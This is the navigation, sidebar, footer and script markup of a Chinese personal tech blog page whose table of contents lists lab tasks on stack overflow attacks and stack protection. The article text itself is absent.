class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%BC%80%E5%A7%8B%E6%94%BB%E5%87%BB"><span class="nav-number">1.5.2.</span> <span class="nav-text">2.开始攻击</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task4"><span class="nav-number">1.6.</span> <span class="nav-text">Task4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task5"><span class="nav-number">1.7.</span> <span class="nav-text">Task5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task6"><span class="nav-number">1.8.</span> <span class="nav-text">Task6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task7"><span class="nav-number">1.9.</span> <span class="nav-text">Task7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task8"><span class="nav-number">1.10.</span> <span class="nav-text">Task8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task9"><span class="nav-number">1.11.</span> <span class="nav-text">Task9</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#a-%E5%BC%80%E5%90%AF%E4%BF%9D%E6%8A%A4%E6%A0%88"><span class="nav-number">1.11.1.</span> <span class="nav-text">a.开启保护栈</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#b-%E6%94%BB%E5%87%BB%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%A0%88"><span class="nav-number">1.11.2.</span> <span class="nav-text">b.攻击不可执行栈</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Sekla"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Sekla</p>
  <div class="site-description" itemprop="description">Sekla</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">100</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ShenTiao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ShenTiao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:584892986@qq.com" title="E-Mail → mailto:584892986@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1416875904&auto=0&height=66"></iframe>
      
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sekla</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">288k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">4:22</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":250,"height":500},"mobile":{"show":false},"react":{"opacity":0.9},"log":false});</script></body>
</html>

<script type="text/javascript" src="/js/src/love.js"></script>
